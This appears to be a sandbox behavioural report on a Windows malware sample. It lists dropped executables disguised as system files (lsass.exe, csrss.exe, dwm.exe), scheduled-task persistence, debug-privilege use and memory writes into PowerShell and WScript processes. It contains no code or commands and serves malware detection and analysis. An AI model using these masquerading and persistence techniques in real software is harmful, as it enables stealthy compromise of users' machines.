File opened for modification C:\Program Files (x86)\Common Files\Adobe\RCX781B.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Defender\dllhost.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Defender\5940a34987c991 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\sihost.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\RCX60D6.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\RCX6AC0.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\dllhost.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\dotnet\RCX716D.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\dotnet\RCX717E.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\lsass.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\wininit.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\sihost.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\56085415360792 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files\dotnet\smss.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files\dotnet\69ddcba757bf72 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\en-US\RCX6F59.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\es-ES\fontdrvhost.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\es-ES\5b884080fd4f94 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\ShellExperiences\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\es-ES\fontdrvhost.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Downloaded Program Files\RCX7B1B.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\ShellExperiences\lsass.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Downloaded Program Files\RCX7A9D.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\Downloaded Program Files\55b276f4edf653 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\es-ES\RCX630A.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\es-ES\RCX6388.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\ShellExperiences\RCX682E.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\ShellExperiences\RCX682F.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\ShellExperiences\lsass.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Users\All Users\Start Menu\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Users\All Users\Start Menu\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Users\All Users\Start Menu\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Users\All Users\Start Menu\dwm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Users\All Users\Start Menu\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Users\All Users\Start Menu\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Users\All Users\Start Menu\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\All Users\Start Menu\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\All Users\Start Menu\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\All Users\Start Menu\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\All Users\Start Menu\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\All Users\Start Menu\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\All Users\Start Menu\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\All Users\Start Menu\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 228 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Users\All Users\Start Menu\dwm.exe
PID 228 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe C:\Users\All Users\Start Menu\dwm.exe
PID 4684 wrote to memory of 768 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 4684 wrote to memory of 768 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 4684 wrote to memory of 4424 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 4684 wrote to memory of 4424 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 768 wrote to memory of 3264 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 768 wrote to memory of 3264 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 3264 wrote to memory of 4148 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3264 wrote to memory of 4148 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3264 wrote to memory of 2140 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3264 wrote to memory of 2140 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 4148 wrote to memory of 3416 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 4148 wrote to memory of 3416 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 3416 wrote to memory of 3424 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3416 wrote to memory of 3424 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3416 wrote to memory of 3124 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3416 wrote to memory of 3124 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3424 wrote to memory of 5056 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 3424 wrote to memory of 5056 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 5056 wrote to memory of 2076 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 5056 wrote to memory of 2076 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 5056 wrote to memory of 2196 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 5056 wrote to memory of 2196 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 2076 wrote to memory of 1512 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 2076 wrote to memory of 1512 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 1512 wrote to memory of 2956 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 1512 wrote to memory of 2956 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 1512 wrote to memory of 1212 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 1512 wrote to memory of 1212 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 2956 wrote to memory of 744 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 2956 wrote to memory of 744 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 744 wrote to memory of 5004 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 744 wrote to memory of 5004 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 744 wrote to memory of 4848 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 744 wrote to memory of 4848 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 5004 wrote to memory of 3712 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 5004 wrote to memory of 3712 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
